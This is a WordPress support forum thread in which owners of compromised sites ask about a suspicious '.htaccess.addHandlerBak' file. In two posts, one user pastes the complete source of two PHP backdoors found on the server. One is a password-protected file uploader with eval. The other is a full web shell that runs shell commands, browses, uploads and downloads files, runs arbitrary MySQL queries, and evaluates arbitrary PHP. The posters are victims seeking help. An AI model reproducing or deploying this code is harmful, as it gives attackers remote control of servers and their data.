WordPress.org

Ready to get started?Download WordPress

Forums

what is .htaccess.addHandlerBak? (7 posts)

  1. lightfoot33
    Member
    Posted 6 years ago #

    Hi,
    I recently had my site's security compromised (basically someone was sending spam from one of my email accounts) and because of this, hostmonster suspended my site until it is resolved. They said that I need to find the script that is sending these spam emails, but couldn't provide any further help.

    I am looking at my files through control panel for any suspicious files, and one that I came across what this one:
    .htaccess.addHandlerBak

    I am familiar with the .htaccess file, but had not seen this one before.

    Does anyone have any information about it?

  2. steeljawscribe
    Member
    Posted 6 years ago #

    I'd like to know as well.

  3. ClaytonJames
    Member
    Posted 6 years ago #

    Every Google hit I see in reference to this file seems to represent itself (to my unskilled eyes at least), as the signature of a hack, or appears in an un-protected directory of someone who has been hacked.

  4. Ivovic
    Member
    Posted 6 years ago #

    I can guarantee that this won't be the only unwanted file there.

    backup your images/videos/etc, delete the bang lot(*all of it*)... reload a fresh copy of wordpress and all plugins.

  5. Mobster
    Member
    Posted 6 years ago #

    Any more details on this?

  6. Mobster
    Member
    Posted 6 years ago #

    I found files with this code all throughout my site.

    <?php
    @error_reporting(E_ALL);
    @set_time_limit(0);
    global $HTTP_SERVER_VARS;
    
    define('PASSWD','their password not mine?');
    
    function say($t) {
      echo "$t\n";
    };
    
    function testdata($t) {
      say(md5("mark_$t"));
    };
    
    echo "<pre>";
    testdata('start');
    if (md5($_POST["p"]) == PASSWD) {
      if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"),
        $HTTP_POST_FILES["s"]["size"])) {
          if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code))
          {
          testdata('save_ok');
          };
          //eval($code);
      } else {
        testdata('save_fail');
      };
    
      if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
        $HTTP_POST_FILES["f"]["size"]))
      {
          eval($code);
          testdata('ok');
      } else {
        testdata('fail');
      };
    
    } else {
      testdata('pass');
    };
    
    testdata('end');
    echo "</pre>";
    ?>
  7. Mobster
    Member
    Posted 6 years ago #

    Maybe an upper level Dev could please respond?

    I found this on my server.

    <?php
    #------------------Security------------------#
    $name_c = "checkIndentity";
    function get_c($name_c){
    	foreach($_COOKIE as $key=>$value) {
    		if	($key == $name_c)
    		    return $c = $value;
    		  else
    	  		return false;
    		}
    }
    function is_cookie ($search_cookie) {
    	foreach($_COOKIE as $key=>$value) {
    		if	($value == $search_cookie)
    		    return true;
    		  else
    	  		return false;
    		}
    	}
    
    	if (md5($_REQUEST['p']) == "1b0ca22694b8eb1303af4d535bc15df7" || is_cookie(get_c($name_c))){
    		if(!is_cookie(get_c($name_c))) setcookie("checkIndentity",md5($_REQUEST['p']));
    #------------------END Security------------------#
    ##################################################
    #------------------Private Class------------------#
    class browseDir {
    var $pwd;
    var $newLocation;
    
    function browseDir(){
    	$d=$this->pwd = getcwd();
    	$this->changeDir($d);
    }
    
    function upload($ifupload){
    	if(isset($ifupload)){
     	   $uploadfile = getcwd().'/'.basename($_FILES['uploadfile']['name']);
    	if (! move_uploaded_file($_FILES['uploadfile']['tmp_name'], $uploadfile)){
    			print "Unable to move ".
    			$_FILES['uploadfile']['tmp_name']." file to<br />$uploadfile<br />";
    		}
    		if (file_exists($uploadfile)) @chmod($uploadfile, 0777);
      }
    }
    
    function changeDir ($dir){
    			$dir=trim($dir);
    			@chdir($this->pwd);
    		if (!file_exists($dir)){print "$dir: No such file or directory<br />\n";return;}
    		if (!@chdir($dir)) {print "$dir: Failed<br />\n";return;}
    	return $this->pwd = getcwd();
    }
    
    function getDirList($newLocation=''){
    		  $handle = '';
    		  $self = $_SERVER['PHP_SELF'];
       if (empty($this->newLocation) && $this->newLocation == ''){
       		  $_SESSION['lastchg'] = '.';
    	   	  $handle = @opendir($this->pwd);
    	if(!$handle) {print "No perms to read: ".$this->pwd.'<br />';}
    	   	  $dirs = array();
    		  $files = array();
    	  while (false !== ($file = @readdir($handle))) {
    			if ($file != ".") {
    				if (is_dir($file)) $dirs[] = $file;
    				  else $files[] = $file;
    			}
    		}
       }
      if (!empty($this->newLocation) && $this->newLocation != ''){
    	 	if(isset($_SESSION['lastchg'])) {
    		 	$this->pwd = &$_SESSION['lastchg'];
    			$_SESSION['lastchg'] = $this->changeDir($this->newLocation);
    	 	}
    	 	if(empty($_SESSION['lastchg'])) $_SESSION['lastchg'] = $this->changeDir($this->newLocation);
    	 }
    	 	 $handle = @opendir($this->pwd);
    	if(!$handle) {print "No perms to read: ".$this->pwd.'<br />';}
    	   	 $dirs = array();
    		 $files = array();
    	  while (false !== ($file = @readdir($handle))) {
    			if ($file != ".") {
    				if (is_dir($file)){
    					$dirs[] = $file;
    				} else {
    					$files[] = $file;
    				}
    			}
    		}
    	@closedir($handle);
    	natcasesort($files);
    	natcasesort($dirs);
    print '<tr><td valign="top">';
    print '<i>'.getcwd().'</i><br />';
    print '<hr><br />';
    		foreach ($dirs as $d){
    			print '<a href="?command='.urlencode($d).'">'.htmlentities($d)."</a><br />\n";
    		}
    			print '<hr/>';
    		foreach ($files as $f){
    			if (is_readable($f))
    				 print '<a target="_blank" href="'.$_SERVER['PHP_SELF'].'/'.urlencode($f).'?getfile='. urlencode($f).'">'.htmlentities($f).'</a>';
    			  else print htmlentities($f);
    
    			print "<br />\n";
    		}
    		print "<br />\n";
    		print "<br />\n";
    	if (is_writeable(getcwd())){
    		 print '<form enctype="multipart/form-data" action="'.$self.'" method="post">';
    		 print '<input type="file" name="uploadfile" />';
    		 print '<input type="submit" name="submit" value="Upload" />';
    		 print '</form>';
    	}
    		print "</td><td>";
      }
    
    function showFile ($fname,$escapeOutput = true){
    			if(empty($this->pwd) && $this->pwd=='') $this->pwd = '.';
    				$fullpath = $_SESSION['lastchg']."/$fname"; $ctype = 'text/plain';
    			if (!  is_readable($fullpath)){print "Unable to read $fullpath";return;}
    			if ($ctype == 'text/html' && $escapeOutput) header("Content-type: text/plain\r\n\r\n");
    			  else header( "Content-type: $ctype\r\n\r\n");
    			if($fh=@fopen($fullpath,'r')){
    				$code=@fread($fh,filesize($fullpath));
    				@fclose($fh);
    				echo $code;
    			}else readfile($fullpath);
    }
    
    function send_file($dist_name='') {
    	ob_end_clean();
    	/*$e = split("/", strrev($dist_name), 2);
    	$name = strrev($e[0]);
    	$distination = strrev($e[1]);
    	$path = $distination."/".$name;*/
    	if(empty($this->pwd) && $this->pwd == '') $this->pwd = '.';
    		$path = $this->pwd."/$dist_name";
    if (!is_file($path) or connection_status()!=0) return(FALSE);
    	header("Cache-Control: no-store, no-cache, must-revalidate");
    	header("Cache-Control: post-check=0, pre-check=0", false);
    	header("Pragma: no-cache");
    	header("Expires: ".gmdate("D, d M Y H:i:s", mktime(date("H")+2, date("i"), date("s"), date("m"), date("d"), date("Y")))." GMT");
    	header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
    	header("Content-Type: application/octet-stream");
    	header("Content-Length: ".(string)(filesize($path)));
    	header("Content-Disposition: inline; filename=".str_replace(" ","",$name));
    	header("Content-Transfer-Encoding: binary\n");
    if ($file = fopen($path, 'rb')) {
    	while(!feof($file) and (connection_status()==0)) {
    	print(fread($file, 1024*8));
    	flush();
    	}
    	fclose($file);
    	}
    	return((connection_status()==0) and !connection_aborted());
    }
    
    function shh_curPageURL() {
     global $SLASHSTR;
     $pageURL = 'http';
     //if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
     $pageURL .= "://";
     if ($_SERVER["SERVER_PORT"] != "80") {
      $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
     } else {
      $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
     }
     if(!strstr($pageURL, $SLASHSTR)){
      if(strpos($pageURL, '?')){$pageURL.="&$SLASHSTR";}else{$pageURL.="?$SLASHSTR";}
     }
     return $pageURL;
     }
    
    function print_a( $TheArray ){
        echo "<table border="1">\n";
        $Keys = array_keys( $TheArray );
        foreach( $Keys as $OneKey ){
          echo "<tr>\n";
          echo "<td bgcolor="'#727450'">";
          echo "<B>" . $OneKey . "</B>";
          echo "</td>\n";
          echo "<td bgcolor="'#C4C2A6'">";
            if ( is_array($TheArray[$OneKey]) )
              $this->print_a($TheArray[$OneKey]);
            else
              echo $TheArray[$OneKey];
          echo "</td>\n";
    
          echo "</tr>\n";
        }
        echo "</table>\n";
      }
    }
    #------------------END Private Class------------------#
    #######################################################
    #------------------Define Variables------------------#
    $isupload = $_REQUEST['submit'];
    $SLASHSTR='sht=%22';
    $openFile = '';if(isset($_REQUEST['getfile'])){$openFile=trim($_REQUEST['getfile']);}
    $shhptr='';if(isset($_REQUEST['shhptr'])){$shhptr=trim($_REQUEST['shhptr']);}	//  print_r($_REQUEST);
    $_SESSION['button'] = $shhptr;$page = $_SESSION['button'];
    $newLocation='';if(isset($_REQUEST['command'])){$newLocation=trim($_REQUEST['command']);}
    $cmd='';if(isset($_REQUEST['cmd'])){$cmd=trim($_REQUEST['cmd']);}
    $shhcmd='';if(isset($_REQUEST['shhcmd'])){$shhcmd=trim($_REQUEST['shhcmd']);}
    $shhqry='';if(isset($_REQUEST['shhqry'])){$shhqry=trim($_REQUEST['shhqry']);}
    $sdbhst='';if(isset($_REQUEST['sdbhst'])){$sdbhst=trim($_REQUEST['sdbhst']);}
    $sdbusr='';if(isset($_REQUEST['sdbusr'])){$sdbusr=trim($_REQUEST['sdbusr']);}
    $sdbpsw='';if(isset($_REQUEST['sdbpsw'])){$sdbpsw=trim($_REQUEST['sdbpsw']);}
    $sdbsch='';if(isset($_REQUEST['sdbsch'])){$sdbsch=trim($_REQUEST['sdbsch']);}
    $shhcod='';if(isset($_REQUEST['shhcod'])){$shhcod=trim($_REQUEST['shhcod']);}
    $shhx='no';if(isset($_REQUEST['shhx'])){$shhx=trim($_REQUEST['shhx']);}
    $shhfnm='';if(isset($_REQUEST['shhfnm'])){$shhfnm=trim($_REQUEST['shhfnm']);}
    $slashtest=false;if(isset($_REQUEST['sht'])){$slashtest=trim($_REQUEST['sht']);}
    if(($slashtest!=false)&&($slashtest!='')){if($slashtest==='\"'){
    $shhcod = stripslashes($shhcod);
    $shhcmd = stripslashes($shhcmd);
    $shhqry = stripslashes($shhqry);
    }}
    #------------------END Define Variables------------------#
    ##########################################################
    		$browser = new browseDir();
    		session_start();
    		if($openFile!='') {$browser->showFile($openFile);exit;}
    ?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
        "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <SCRIPT type="text/javascript">
    function submitform(num){
      var num;
      document.theshll.shhptr.value = num;
      document.theshll.submit();
    }
    </SCRIPT>
    <style type="text/css">
    input{color:#2EFE2E;background-color:black;margin:3px;}
    textarea{border-color:white;color:#2EFE2E;background-color:black;margin:3px;}
    body{color:white;background-color:black;}
    a{color:white;}
    td{border-color:white;color:#2EFE2E;background-color:black;margin:1px;}
    th{color:green;}
    </style>
    </head>
    <body>
    <? if($shhptr == 0 || $shhptr == ''){?>
    
    <table border="1"  align="left" >
    <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post" name="theshll" id="theshll">
    <input type="hidden" name="shhptr" value="<?php echo $shhptr ?>" />
    <input type="button" name="1" value="SQL" onmousedown="submitform(1);" />
    <input type="button" name="2" value="EVAL" onmousedown="submitform(2);" />
    <tr>
     <th>CurrentDirectoryListing</th>
     <td><input align="left" type="text" name="cmd" size="60"  />
       <input type="submit" value="EXECUTE" /></td>
    </tr>
    </form>
    <?php
    	$browser->newLocation = $newLocation;$browser->upload($isupload);
        $browser->getDirList(); echo"<textarea wrap=\"off\" readonly rows=\"20\" cols=\"90\">";
      if(($shhptr=='')&&($cmd!='')){
          if(passthru($cmd, $out)){
            echo htmlentities(implode("\n",$out));
          }
        }
      echo "</textarea></td></tr>";
    ?>
    </table>
    <?}?>
    
    <?if(($page=='1')){?>
    <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post" name="theshll" id="theshll">
    <input type="hidden" name="shhptr" value="<?php echo $shhptr ?>" />
    <input type="button" name="1" value="BROWSE" onmousedown="submitform(0);" />
    <input type="button" name="2" value="EVAL" onmousedown="submitform(2);" />
    <div style="width: 600px;">
    <div style="float:left;">
    <input type="text" name="sdbhst" size="20" value="<?php echo $sdbhst; ?>" />.::Host:. <br />
    <input type="text" name="sdbsch" size="20" value="<?php echo $sdbsch; ?>" />.::DB:.</div>
    <div style="margin-left:20px;float:left;">
    <input type="text" name="sdbusr" size="20" value="<?php echo $sdbusr; ?>" />.::User:.<br />
    <input type="text" name="sdbpsw" size="20" value="<?php echo $sdbpsw; ?>" />.::Pass:.</div>
    <input type="text" name="shhqry" size="80" value="<?php echo $shhqry; ?>" />
    <input type="submit" value="QUERY" /></form>
    <?php
      echo "<table>";
      if(($shhptr=='1')&&($shhqry!='')){
        if ($mysql = @mysql_connect($sdbhst, $sdbusr, $sdbpsw)){
          if(@mysql_select_db($sdbsch)) {
            if($res = @mysql_query($shhqry)){
              if($row = mysql_fetch_assoc($res)){
                while($row = mysql_fetch_assoc($res)){
                  $arr[] = $row;
                }
               $browser->print_a($arr);
              }
            } else echo "mysql query error: ".mysql_error()."\n";
          } else echo "mysql select error: ".mysql_error()."\n";
          @mysql_close($mysql);
        } else echo "mysql connect error: ".mysql_error()."\n";
      }
      echo "</table>";
    }
    if(($page=='2')){
    ?>
    <form action="<?php echo $browser->shh_curPageURL(); ?>" method="post" name="theshll" id="theshll">
    <input type="hidden" name="shhptr" value="<?php echo $shhptr ?>" />
    <input type="button" name="1" value="BROWSE" onmousedown="submitform(0);" />
    <input type="button" name="2" value="SQL" onmousedown="submitform(1);" />
    <br />
    <input type="text" name="shhfnm" size="40" value="<?php echo $shhfnm; ?>" />
    <input type="submit" name="shhx" value="SAVE AS" />
    <input type="submit" name="shhx" value="INCLUDE/RUN" /><br />
    <input type="submit" name="shhx" value="EVALUATE" /><br />
    <textarea name="shhcod" wrap="off" rows="15" cols="65" >
    <?php echo $shhcod;?>
    </textarea>
    </form>
    <?php
      echo "<div id=\"reslt\">";
      switch($shhx){
      case 'EVALUATE':
        if($shhcod!=''){
        	ob_start();
            eval($shhcod);
    		$eval=ob_get_contents();
            ob_end_clean();
        } else {
            ob_start();
            echo "Enter PHP code!";
            $eval=ob_get_contents();
            ob_end_clean();
            }
            break;
      case 'SAVE AS':
        if($shhfnm!=''){
          $f = @fopen($shhfnm, 'w');
          if($f){
            if(strpos($shhcod, '<?php')===false){
              $shhcodz = "<?php\n".$shhcod."\n".'?'.'>';
            } else $shhcodz = $shhcod;
            fwrite($f, $shhcodz);
            fclose($f);
            echo "Saved.";
          } else echo "Cannot write file!\n";
        } else echo "Enter file name!\n";
        break;
      case 'INCLUDE/RUN':
        if($shhfnm!=''){
          if (!@include($shhfnm)){
            echo "Include error!";
          };
        } else echo "Enter file name!\n";
        break;
      }
    if(!empty($eval) && $eval != ''){
      echo '<table align="left" border="0" >';
      echo '<th align="center">EVAL OUTPUT:</th>';
      echo '</table><br />';
      echo '<br />';
      echo '<table align="left" border="1" width="48%" height="30%">';
      echo '<tr><td align="center">'.$eval.'</td></tr>';
      echo '</table>';
     }
    }
    ?>
    <th ></th>
    </body></html>
    <?}?>

Topic Closed

This topic has been closed to new replies.

About this Topic